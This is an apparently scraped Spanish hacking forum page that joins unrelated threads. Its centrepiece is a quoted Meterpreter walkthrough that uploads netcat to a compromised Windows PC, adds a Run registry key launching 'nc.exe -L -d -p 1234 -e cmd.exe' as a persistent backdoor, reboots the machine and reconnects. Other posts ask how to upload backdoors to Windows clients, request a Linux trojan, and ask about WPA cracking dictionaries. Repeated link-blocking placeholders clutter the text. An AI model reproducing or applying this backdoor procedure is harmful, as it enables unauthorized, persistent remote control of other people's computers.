Hola a todos

Viendo Metasploit vi los módulos auxiliares que no se lo que son, y mi pregunta es:
¿Que son, para que sirve y cual es su funcionamiento? 

Saludos

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Te pasteo desde q se abre la sesión con meterpreter:



Meterpreter session 1 opened (192.168.0.2:1934 -> 192.168.0.3:4444)

meterpreter >
Ahora estamos dentro del P.C Remoto, Subamos el Archivo NetCat de nuestra P.C a la P.C Remota, con uso del comando upload. Miremos que opciones tiene esté comando.



meterpreter > upload
Usage: upload [options] [Ubicación Archivo Local] [Ubicación Archivo Remoto]

Uploads local files and directories to the remote machine.

OPTIONS:

-r Upload recursively.

meterpreter > Así:


meterpreter > upload C:\\Windows\\System32\\nc.exe C:\\Windows\\System32\\
uploading : C:\Windows\System32\nc.exe -> C:\Windows\System32\
uploaded : C:\Windows\System32\nc.exe -> C:\Windows\System32\\nc.exe
meterpreter > Despues crearemos una clave dentro del Registro de Windows con la siguiente ruta:


HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run


Asi:



meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run -v Hacked -d 'C:\Windows\System32\nc.exe -L -d -p 1234 -e cmd.exe'
Successful set Hacked.
meterpreter > Ahora solo nos queda reiniciar el P.C remoto con el comando Reboot. Asi:



meterpreter > reboot
Rebooting...
meterpreter >Y por ultimo conectarnos con el BackDoor que acabamos de dejar en la P.C Remota. Podemos usar el Mismos Metasploit o la Consola de Windows. En este caso usaremos el Metasploit. Así:



msf > connect 192.168.0.3 1234
Connected to 192.168.0.3:1234


fuente: shellsecurity

Ooohhhhh he visto la luz ¡Gracias!

Saludos

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Si lanzas el exploit supongo que lo hiciste desde metasploit, si es el caso revisa sobre los Payload lo cual puedes hacer uso de una shell la cual te dara con una sesion de meterpreter y a ello ya haz volar tu imaginación.

Regards,
Snifer

Sí, me lo he imaginao, pero supongo que al cabo de un rato el firewall me echara, o en el caso cuando pase el tiempo, se pondrá el parche a ese agujero de seguridad y no podre volver a acceder.

Saludos

Hola a todos.

Tengo una pequeña duda, y es una vez dentro de la maquina a traves de un exploit, ¿a una maquina cliente de Windows, como le subo la backdoors?

A un servidor si es linux o Windows se que lo puedo subir por wget (Linux) ftp o tftp (Windows o linux).

¿Pero cliente Windows?

Esta muy bien le echare un ojo, pero por ahora lo que me corre un poco de bulla es:

Yo tengo mi router con la contraseña por ejemplo, aj38dhsy87sa3, bien ahora yo lo que quiero es hacer un fichero con dicha contraseña.

El caso es que creo un .txt y al pasarlo por aircrack-ng me salta con un error (Passphrase not in dictionary)


Saludos

Hola a todos.

Quisiera saber como poder generar un diccionario para WPA.

¿Sabéis de algún tuto?

Saludos

Hola a todos.

Bueno necesito un troyano que trabaje bajo linux, y no bajo windows como bifrost, Spy-net etc, no me digáis que use Wine, no me gusta xD.

¿ Conocéis alguno?

Saludos

Bueno lo puse en mis repositorios, y todo muy bien hasta que al hacer el update, me sale esto.


Ign You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login squeeze Release.gpg         
Ign You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login squeeze/main Translation-en                 
Ign You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login squeeze/main Translation-es                 
Ign You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login squeeze/main Translation-en           
Ign You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login squeeze Release                               
Obj You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login squeeze/main Translation-es
Ign You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login squeeze/main i386 Packages                   
Err You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login squeeze/main i386 Packages                   
  404  Not Found

W: Imposible obtener You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login  404  Not Found

Saludos

Hola a todos.

Estoy usando la distro Kali Linux basada en Debian.

El caso es que xplico no viene incluida en dicha distro, y al querer instalarlo parece ser que nada mas está para sistemas basados en Ubuntu.

¿Alguna solución para poder instalarlo en Debian?

Saludos